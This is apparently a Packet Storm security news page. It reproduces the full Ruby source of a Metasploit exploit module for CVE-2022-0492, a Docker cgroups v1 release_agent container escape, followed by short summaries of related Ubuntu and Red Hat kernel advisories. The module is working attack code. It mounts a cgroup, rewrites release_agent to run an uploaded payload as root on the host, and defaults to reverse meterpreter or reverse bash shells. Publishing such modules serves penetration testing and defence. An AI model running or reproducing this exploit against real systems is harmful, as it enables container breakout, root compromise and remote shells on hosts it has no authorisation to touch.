Security
Headlines
HeadlinesLatestCVEs

Headline

Docker cgroups Container Escape

This Metasploit exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability. If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system. A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.

Packet Storm
#vulnerability#ubuntu#linux#git#auth#docker
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html  include Msf::Post::Linux::Priv  include Msf::Post::Linux::Kernel  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Docker cgroups Container Escape',        'Description' => %q{          This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.          If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.          A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function.          This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges          and bypass the namespace isolation unexpectedly.          More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates.          If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file,          an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent          file is owned by root, so only a user with root access can modify it.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Yiqi Sun', # discovery          'Kevin Wang', # discovery          'T1erno', # POC        ],        'Platform' => [ 'unix', 'linux' ],        'SessionTypes' => ['meterpreter'],        'DefaultOptions' => {          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'        },        'Privileged' => true,        'References' => [          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24f6008564183aa120d07c03d9289519c2fe02af'],          [ 'URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],          [ 'URL', 'https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC'],          [ 'URL', 'https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492'],          [ 'URL', 'https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker/blob/main/escape-check.sh'],          [ 'URL', 'https://pwning.systems/posts/escaping-containers-for-fun/'],          [ 'URL', 'https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html'],          [ 'URL', 'https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation'],          [ 'URL', 'https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/'],          [ 'CVE', '2022-0492']        ],        'DisclosureDate' => '2022-02-04',        'Targets' => [          ['BINARY', { 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } }],          ['CMD', { 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        }      )    )    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])    ]  end  def base_dir    datastore['WritableDir']  end  def check    print_status('Unable to determine host OS, this check method is unlikely to be accurate if the host isn\'t Ubuntu')    release = kernel_release    # https://people.canonical.com/~ubuntu-security/cve/2022/CVE-2022-0492    release_short = Rex::Version.new(release.split('-').first)    release_long = Rex::Version.new(release.split('-')[0..1].join('-'))    if release_short >= Rex::Version.new('5.13.0') && release_long < Rex::Version.new('5.13.0-37.42') || # Ubuntu 21.10       release_short >= Rex::Version.new('5.4.0') && release_long < Rex::Version.new('5.4.0-105.119') || # Ubuntu 20.04 LTS       release_short >= Rex::Version.new('4.15.0') && release_long < Rex::Version.new('4.15.0-173.182') || # Ubuntu 18.04 LTS       release_short >= Rex::Version.new('4.4.0') && release_long < Rex::Version.new('4.4.0-222.255') # Ubuntu 16.04 ESM      return CheckCode::Vulnerable("IF host OS is Ubuntu, kernel version #{release} is vulnerable")    end    CheckCode::Safe("Kernel version #{release} may not be vulnerable depending on the host OS")  end  def exploit    # Check if we're already root as its required    fail_with(Failure::NoAccess, 'The exploit needs a session as root (uid 0) inside the container') unless is_root?    # create mount    folder = rand_text_alphanumeric(5..10)    @mount_dir = "#{base_dir}/#{folder}"    register_dir_for_cleanup(@mount_dir)    vprint_status("Creating folder for mount: #{@mount_dir}")    mkdir(@mount_dir)    print_status('Mounting cgroup')    cmd_exec("mount -t cgroup -o rdma cgroup '#{@mount_dir}'")    group = rand_text_alphanumeric(5..10)    group_full_dir = "#{@mount_dir}/#{group}"    vprint_status("Creating folder in cgroup for exploitation: #{group_full_dir}")    mkdir(group_full_dir)    print_status("Enabling notify on release for group #{group}")    write_file("#{group_full_dir}/notify_on_release", '1')    print_status('Determining the host OS path for image')    # for this, we need the line that starts with overlay, and contains an 'upperdir' parameter, which we want the value of    mtab_file = read_file('/etc/mtab')    host_path = nil    mtab_file.each_line do |line|      next unless line.start_with?('overlay') && line.include?('perdir') # upperdir      line.split(',').each do |parameter|        next unless parameter.start_with?('upperdir')        parameter = parameter.split('=')        fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') unless parameter.length > 1        host_path = parameter[1]      end      break    end    fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') if host_path.nil? || host_path.empty? || host_path.start_with?('sed') # start_with catches repeat of command    vprint_status("Host OS path for image: #{host_path}")    payload_path = "#{base_dir}/#{rand_text_alphanumeric(5..10)}"    print_status("Setting release_agent path to: #{host_path}#{payload_path}")    write_file "#{@mount_dir}/release_agent", "#{host_path}#{payload_path}"    print_status("Uploading payload to #{payload_path}")    if target.name == 'CMD'      # for whatever reason it's unhappy and wont run without the /bin/sh header      upload_and_chmodx payload_path, "#!/bin/sh\n#{payload.encoded}\n"    elsif target.name == 'BINARY'      upload_and_chmodx payload_path, generate_payload_exe    end    register_files_for_cleanup(payload_path)    print_status("Triggering payload with command: sh -c \"echo \$\$ > #{group_full_dir}/cgroup.procs\"")    cmd_exec(%(sh -c "echo \$\$ > '#{group_full_dir}/cgroup.procs'"))  end  def cleanup    if @mount_dir      vprint_status("Cleanup: Unmounting #{@mount_dir}")      cmd_exec("umount '#{@mount_dir}'")    end    super  endend

Related news

CVE-2021-40012: July

Vulnerability of pointers being incorrectly used during data transmission in the video framework. Successful exploitation of this vulnerability may affect confidentiality.

CVE-2022-20233: Pixel Update Bulletin—June 2022  |  Android Open Source Project

In param_find_digests_internal and related functions of the Titan-M source, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-222472803References: N/A

Kernel Live Patch Security Notice LSN-0086-1

It was discovered that a race condition existed in the network scheduling subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Yiqi Sun and Kevin Wang discovered that the cgroups implementation in the Linux kernel did not properly restrict access to the cgroups v1 release_agent feature. A local attacker could use this to gain administrative privileges. Various other issues were also addressed.

RHSA-2022:4717: Red Hat Security Advisory: kernel security update

An update for kernel is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-0492: kernel: cgroups v1 release_agent feature may allow privilege escalation

RHSA-2022:4721: Red Hat Security Advisory: kpatch-patch security update

An update is now available for Red Hat Enterprise Linux 7.7 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-0492: kernel: cgroups v1 release_agent feature may allow privilege escalation

Red Hat Security Advisory 2022-4642-01

Red Hat Security Advisory 2022-4642-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include null pointer and privilege escalation vulnerabilities.

RHSA-2022:4642: Red Hat Security Advisory: kernel security and bug fix update

An update for kernel is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-0492: kernel: cgroups v1 release_agent feature may allow privilege escalation

Red Hat Security Advisory 2022-2186-01

Red Hat Security Advisory 2022-2186-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include privilege escalation and use-after-free vulnerabilities.

RHSA-2022:2211: Red Hat Security Advisory: kpatch-patch security update

An update for kpatch-patch is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4028: kernel: use-after-free in RDMA listen() * CVE-2022-0492: kernel: cgroups v1 release_agent feature may allow privilege escalation

RHSA-2022:2186: Red Hat Security Advisory: kernel security and bug fix update

An update for kernel is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support, Red Hat Enterprise Linux 7.6 Telco Extended Update Support, and Red Hat Enterprise Linux 7.6 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4028: kernel: use-after-free in RDMA listen() * CVE-2022-0492: kernel: cgroups v1 release_agent feature may allow privilege escalation

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution